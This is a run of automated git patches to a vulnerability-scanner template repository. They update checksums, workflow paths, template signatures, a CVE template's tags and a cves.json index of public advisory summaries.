+http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:d41ea91bd758def3c103261c7b0fd328d78cea00 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:007380d71963077625fdf08a1db370e62c998e7a +http/technologies/wordpress/plugins/sucuri-scanner.yaml:724fa3b6e05d4ec0513ceaf313355be5f4cf3c83 +http/technologies/wordpress/plugins/svg-support.yaml:d3fe99b24369eedee1178ebc3efee7902484840a +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:285438bd59d6615e1e8a1ca9f7810f76cbc0caa3 +http/technologies/wordpress/plugins/tablepress.yaml:d055fb1a8c9ba28daabf12ce64ba1e55da1942df +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:1045d3687258ed53d948cbb42dff50002cec7a77 +http/technologies/wordpress/plugins/templately.yaml:6bc4ae0f516b981c7075446febd271ec6eeefa7c +http/technologies/wordpress/plugins/the-events-calendar.yaml:addd04e81b60e701b5567cab9a6ad7a2f39f3de6 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:52e606aa09bf5d62b4effcf493a604b5aa3f63fa +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:2de4d3ff6763f57a0566a0feb74c94c6e91351bd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:31e4b8e6875538812ee2d7506bfa14807718a778 +http/technologies/wordpress/plugins/under-construction-page.yaml:f89c028b789d3c1469442f0761dc733e9f8e3efe http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:ca4d717fe515b7eb6536411561bb5541b05681fa +http/technologies/wordpress/plugins/updraftplus.yaml:f24d0f585f2dcb853621962049caf76f2c0a4175 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:a8c112d8789b224f75fdee21f504164342481d4a http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:9a153f9dbb996c2a34fbfad57e1508bb7475bcc9 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:b9859d2738d0cb5f9d95a1708f90684a8cea2067 +http/technologies/wordpress/plugins/webp-express.yaml:f1dc43c6bfd5a4d2a08abca716f4eb15d24fe240 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:d6dbca2a837397ef314ac750919a6a1d0abd97d3 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:9aa5958a6fec3232486e1a7dabffcecd30f839ca +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:91ac4bac699abae468ae20412fb1a128391d1172 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:6c276856292ef73067c3b9fb2b272360f63a3520 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:88e2b0d37a4e446c3051b4acb725f7f7e6d02625 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:2191b546ebaa3e7d1885ec3499dfb72ac180fb7f +http/technologies/wordpress/plugins/woocommerce-payments.yaml:11befb2f13b313ac30f9522d9653d7020623f76d +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:9476c689e0d2db8f1dcb36f5afe156b17ce92d15 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:7f071c8cb054dae06c95e9bf4bc39b5b1219607f +http/technologies/wordpress/plugins/woocommerce-services.yaml:437a349c2371192c51e3749c858fc94f28b39368 +http/technologies/wordpress/plugins/woocommerce.yaml:6c452de0f97bedc65d688714d5a31efa62517987 +http/technologies/wordpress/plugins/wordfence.yaml:6da1567be237b5918d29b654cd07e53aa513d0fa +http/technologies/wordpress/plugins/wordpress-importer.yaml:7cac168974312671c5861e1e0965bc3a8b74178f +http/technologies/wordpress/plugins/wordpress-seo.yaml:6152c9c31da20db6ddb07a19ff6dfb50030e6bd9 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:bb9cec1eb9b7689e8afa5f9f967d0827f0547fe7 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:85ec05387023c62e59deed5e297d2c91fefc8d94 +http/technologies/wordpress/plugins/wp-file-manager.yaml:fa1ba8fb3fa79cd72f5114cf4cd17a43c687af9b +http/technologies/wordpress/plugins/wp-google-maps.yaml:87bae1623c501b7a4155c77f46933a5c42bc6ea8 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:75eaa01dadbf24bd9ab0bc0be1d795375e0f34e7 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:9f8adb86e971de723482a26b77d49380ffe9bab7 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:6d23c570b800f9b47cd6b533c4f1b5d827cde5cf +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:7e8d61d4b5cbed4da9dbb03235845509fd823c2c +http/technologies/wordpress/plugins/wp-optimize.yaml:46e5daa58e9b30d9893c52ef06a37a1380cbf6af +http/technologies/wordpress/plugins/wp-pagenavi.yaml:d63254279741a68af313321a111dcb500947196a +http/technologies/wordpress/plugins/wp-reset.yaml:bc18441325506791fed82d6f95f1562ab38fab81 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:4264d1cba523b247f81494b330c4f48e142be73b +http/technologies/wordpress/plugins/wp-rollback.yaml:87da2f85342e7f1454d78d39369b03e7d6d58a51 +http/technologies/wordpress/plugins/wp-seopress.yaml:046e7e0b881e6ca75eb6cbf307e7f9f1404e9dab +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:90f90d87e5a57730af8229ef764b557aa76fab15 +http/technologies/wordpress/plugins/wp-smushit.yaml:8797eb9d9a97394fd9499925391e64df9083d419 +http/technologies/wordpress/plugins/wp-statistics.yaml:aac0df1c4b721a927a82395f1d539131d7774014 +http/technologies/wordpress/plugins/wp-super-cache.yaml:054c62a48f4db164625824028b2e2f7444affbea http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:882986f1cd911b724eb9b9baba864395226b2952 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:4b4f07af0fba2cf7a4c6f7d5ee81437578757afc +http/technologies/wordpress/plugins/wpforms-lite.yaml:57d35c802d9960d052d8d1704d582e3121b82c55 +http/technologies/wordpress/plugins/wps-hide-login.yaml:6f1615375df945c8f8dbe093be9a3850df569536 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:9003630715b06cc3ea1a61887b12c149ac7413dd http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:7a5922dea5d84fecfbe6c6aa0fb4e0746074ead1 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8809,7 +8809,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2c839edde04a1ccf82c7ecaf156643f98a7de0a7 +templates-checksum.txt:5bf686dd1d5f8b230fc2bc7a4594c8b23baa5f32 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 872b7fe0f4dfd46c2659e6adbad62c0659119ee9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 05:45:20 +0000 Subject: [PATCH 0744/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 4bd65367af..dad071e7f6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,7 +3,6 @@ on: push: paths: - '.new-additions' - - 'helpers/wordpress/plugins/chaty.yaml' - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' From f7fdc5bfa0681ae994152ede0808d44760e128c7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 05:46:17 +0000 Subject: [PATCH 0745/1841] Auto Template Signing [Mon Jul 1 05:46:17 UTC 2024] :robot: --- http/technologies/wordpress/plugins/chaty.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..f4799118da 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205d574e34d462d5e46cfcaab0b4942233cd743cff0f91e181996828cb12707e5c02202117be10e55c830d652ae8b2411219e8950317aa7fe8b38a5554c673850fe6a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4e92f6e19cdbd4a8ea777140338353af794d3525 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 05:54:59 +0000 Subject: [PATCH 0747/1841] Auto Generated Templates Checksum [Mon Jul 1 05:54:59 UTC 2024] :robot: --- templates-checksum.txt | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7445fbdd29..0320a1cb2e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6809,7 +6809,6 @@ http/takeovers/uptime-takeover.yaml:f9981402d663ec41860331ffca501a55d5a2dce0 http/takeovers/uptimerobot-takeover.yaml:491f4c81a2351d275943abe78437d45010346ef2 http/takeovers/uservoice-takeover.yaml:cfd1730b418655f4ef16ce1fd29ac406af3ac472 http/takeovers/vend-takeover.yaml:61af84b5ce0e9de0f9657e64c793e8c1f22110c6 -http/takeovers/vercel-takeover.yaml:881400eef9e2d67febebc5bbb0ae8e8d40d190dd http/takeovers/wishpond-takeover.yaml:59ed0bc6dabc39d9915c45bea80c75ad96ee00c3 http/takeovers/wix-takeover.yaml:d3f8931c10d51d15a048f8ccd9c603b5f5164b5d http/takeovers/wordpress-takeover.yaml:6943a0158783833fd1797e7500e985be38acaefd @@ -7250,7 +7249,7 @@ http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:b3cf765ed47 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:be29dc53d64b851be2dd27f430b43b50c91e8745 http/technologies/wordpress/plugins/breeze.yaml:53f12e4ba3166fa40bad9e83c7e98c4e378ffe53 http/technologies/wordpress/plugins/broken-link-checker.yaml:17b579f1d9b97813bc463c0934164a57405e88dc -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/chaty.yaml:3cd699342ea81065c8df588a9d4918cc4c184ca1 http/technologies/wordpress/plugins/child-theme-configurator.yaml:78dd6492e8224ddba8ab74d5d89000079d6f0dbe http/technologies/wordpress/plugins/classic-editor.yaml:ff8e86f3e08fb682ca332a875cba87ea33b16ad8 http/technologies/wordpress/plugins/classic-widgets.yaml:50be32e1e31fa49001896f82e7007380922df385 @@ -8809,7 +8808,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5bf686dd1d5f8b230fc2bc7a4594c8b23baa5f32 +templates-checksum.txt:7719c97afc7c7271ff25fddcc40b001a8a926d21 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 981afc29e8feffd17df55866f64ee64f84b24554 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 1 Jul 2024 11:30:12 +0530 Subject: [PATCH 0748/1841] Update CVE-2024-32709.yaml --- http/cves/2024/CVE-2024-32709.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-32709.yaml b/http/cves/2024/CVE-2024-32709.yaml index 77409c450d..575f296b2a 100644 --- a/http/cves/2024/CVE-2024-32709.yaml +++ b/http/cves/2024/CVE-2024-32709.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/wp-recall/" - tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp + tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp,sqli variables: num: "999999999" From 3c633c118bd7fecf7939b5fff6273b7dafedd5bc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 06:03:39 +0000 Subject: [PATCH 0749/1841] Auto Generated cves.json [Mon Jul 1 06:03:39 UTC 2024] :robot: --- cves.json | 2 ++ cves.json-checksum.txt | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 67c97b2eb0..f46ba709a8 100644 --- a/cves.json +++ b/cves.json @@ -2432,6 +2432,7 @@ {"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"} {"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"} {"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"} +{"ID":"CVE-2024-32709","Info":{"Name":"WP-Recall \u003c= 16.26.5 - SQL Injection","Severity":"critical","Description":"The WP-Recall Registration, Profile, Commerce \u0026 More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-32709.yaml"} {"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} {"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"} {"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"} @@ -2446,6 +2447,7 @@ {"ID":"CVE-2024-36412","Info":{"Name":"SuiteCRM - SQL Injection","Severity":"critical","Description":"SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-36412.yaml"} {"ID":"CVE-2024-36527","Info":{"Name":"Puppeteer Renderer - Directory Traversal","Severity":"medium","Description":"puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36527.yaml"} {"ID":"CVE-2024-36837","Info":{"Name":"CRMEB v.5.2.2 - SQL Injection","Severity":"high","Description":"SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36837.yaml"} +{"ID":"CVE-2024-37152","Info":{"Name":"Argo CD Unauthenticated Access to sensitive setting","Severity":"medium","Description":"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37152.yaml"} {"ID":"CVE-2024-37393","Info":{"Name":"SecurEnvoy Two Factor Authentication - LDAP Injection","Severity":"critical","Description":"Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37393.yaml"} {"ID":"CVE-2024-37881","Info":{"Name":"SiteGuard WP Plugin \u003c= 1.7.6 - Login Page Disclosure","Severity":"medium","Description":"The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37881.yaml"} {"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 6feb94634b..1118bf9368 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -bb5f402eb81b9390ee8af7f9d9b96bdf +b82d2c5137c0d383e1c0baa678ff77cb From 8baa7acd51b826e5ca723ccb5c0cbb92b05af7be Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 06:03:59 +0000 Subject: [PATCH 0750/1841] Auto Generated Templates Checksum [Mon Jul 1 06:03:59 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0320a1cb2e..2985f13656 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3439,6 +3439,7 @@ http/cves/2024/CVE-2024-32113.yaml:d33bf2b38e8bb82edabfe4a94fa64fe2aed6cf56 http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c +http/cves/2024/CVE-2024-32709.yaml:ddcd45b6f183564f49784d435acdbd5f4714f795 http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 http/cves/2024/CVE-2024-3274.yaml:b56159631d06052a408c3897ef043b866ce0514c http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab @@ -8808,7 +8809,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7719c97afc7c7271ff25fddcc40b001a8a926d21 +templates-checksum.txt:2347dea70c661f2288793bcb3b25185b3259e68a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 982474aad98ca4805cace20ad91b056fb97e591b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 06:04:19 +0000 Subject: [PATCH 0751/1841] Auto Generated New Template Addition List [Mon Jul 1 06:04:19 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 806809f139..3f05ae1573 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml +http/cves/2024/CVE-2024-32709.yaml http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-37152.yaml http/cves/2024/CVE-2024-37881.yaml From 0c2a100571f3a28fe494c6d42604b18d3b4a000b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 1 Jul 2024 06:05:02 +0000 Subject: [PATCH 0752/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index dad071e7f6..2d7438a2ae 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' + - 'http/cves/2024/CVE-2024-32709.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' - 'http/cves/2024/CVE-2024-37152.yaml' - 'http/cves/2024/CVE-2024-37881.yaml' From e1b0cf73a646543cfb55bcdf84420235995b1f2b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 1 Jul 2024 06:05:29 +0000 Subject: [PATCH 0753/1841] Auto Template Signing [Mon Jul 1 06:05:29 UTC 2024] :robot: --- http/cves/2024/CVE-2024-32709.yaml | 1 + 1 file changed, 1 